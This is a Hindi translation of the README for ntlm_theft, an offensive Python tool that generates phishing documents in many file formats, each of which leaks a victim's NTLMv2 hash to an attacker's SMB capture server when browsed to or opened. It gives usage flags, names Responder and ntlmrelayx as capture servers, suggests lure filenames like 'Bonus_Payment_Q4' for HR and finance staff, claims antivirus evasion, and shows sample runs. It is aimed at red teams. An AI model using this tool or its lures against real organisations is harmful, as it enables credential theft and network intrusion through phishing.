
जैकब विल्किन (ग्रीनवुल्फ) द्वारा NTLMv2 हैश चोरी फ़ाइलों के कई प्रकार उत्पन्न करने के लिए एक उपकरण।
NTLMv2 हैश चोरी फ़ाइलों के कई प्रकार उत्पन्न करने का एक उपकरण।
ntlm_theft एक ओपन सोर्स Python3 उपकरण है जो 21 विभिन्न प्रकार के हैश चोरी दस्तावेज़ उत्पन्न करता है। इनका उपयोग फ़िशिंग के लिए किया जा सकता है जब या तो लक्ष्य अपने नेटवर्क के बाहर smb ट्रैफ़िक की अनुमति देता है, या यदि आप पहले से ही आंतरिक नेटवर्क के अंदर हैं।
मैक्रो-आधारित दस्तावेज़ों या एक्सप्लॉइट दस्तावेज़ों की तुलना में इन फ़ाइल प्रकारों का लाभ यह है कि ये सभी "इच्छित कार्यक्षमता" का उपयोग करके बनाए गए हैं। जून 2020 में विंडोज डिफेंडर एंटीवायरस द्वारा इनमें से किसी को भी फ़्लैग नहीं किया गया था, और पूरी तरह से पैच किए गए विंडोज 10 होस्ट पर 21 में से 17 हमले काम कर गए।
ntlm_theft निम्नलिखित हमले प्रकारों का समर्थन करता है:
ntlm_theft मुख्य रूप से पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए लक्षित है, जो इसका उपयोग लक्ष्य कंपनी के कर्मचारियों पर आंतरिक फ़िशिंग करने, या एंटीवायरस और ईमेल गेटवे का बड़े पैमाने पर परीक्षण करने के लिए करेंगे। इसका उपयोग बाहरी फ़िशिंग के लिए भी किया जा सकता है यदि परिधि फ़ायरवॉल पर आउटबाउंड SMB एक्सेस की अनुमति है।
मैंने पेनिट्रेशन टेस्टिंग के दौरान यह उपयोगी पाया है कि आसानी से देख सकें कि मेरे पास कौन से फ़ाइल प्रकार उपलब्ध हैं, बजाय इसके कि रेड टीमिंग अभियानों में उपयोग किए जाने वाले किसी विशिष्ट हमले को कॉन्फ़िगर करने में समय बिताएं। आप HR विभाग को .rtf या .docx फ़ाइल भेज सकते हैं, और वित्त विभाग को .xlsx स्प्रेडशीट दस्तावेज़ भेज सकते हैं।
ये निर्देश आपको ntlm_theft के लिए आवश्यकताओं और इसका उपयोग करने का तरीका दिखाएंगे।
ntlm_theft को Python3 और xlsxwriter की आवश्यकता है:
pip3 install xlsxwriter
उपकरण शुरू करने के लिए 4 पैरामीटर प्रदान किए जाने चाहिए: एक इनपुट फ़ॉर्मेट, इनपुट फ़ाइल या फ़ोल्डर और मूल चलाने का मोड:
-g, --generate : सभी फ़ाइलें या एक विशिष्ट फ़ाइल प्रकार उत्पन्न करने का चयन करें
-s, --server : आपके SMB हैश कैप्चर सर्वर का IP पता (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, आदि)
-f, --filename : एक्सटेंशन के बिना मूल फ़ाइल नाम, बाद में नाम बदला जा सकता है (जैसे: test, Board-Meeting2020, Bonus_Payment_Q4)
यहाँ एक उदाहरण है कि सभी फ़ाइलें उत्पन्न करते समय एक रन कैसा दिखता है:
# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

यहाँ एक उदाहरण है कि केवल आधुनिक फ़ाइलें उत्पन्न करते समय एक रन कैसा दिखता है:
# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.
यहाँ एक उदाहरण है कि केवल xlsx फ़ाइल उत्पन्न करते समय एक रन कैसा दिखता है:
# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.
ntlm_theft Jacob Wilkin द्वारा निर्मित कॉपीराइट (C) 2020 Jacob Wilkin
यह प्रोग्राम मुफ्त सॉफ्टवेयर है: आप इसे पुनर्वितरित और/या संशोधित कर सकते हैं GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत जैसा कि फ्री सॉफ्टवेयर फाउंडेशन द्वारा प्रकाशित किया गया है, या तो लाइसेंस का संस्करण 3, या (आपकी पसंद पर) कोई बाद का संस्करण।
यह प्रोग्राम इस उम्मीद में वितरित किया जाता है कि यह उपयोगी होगा, लेकिन बिना किसी वारंटी के; यहां तक कि व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी के बिना। अधिक जानकारी के लिए GNU जनरल पब्लिक लाइसेंस देखें।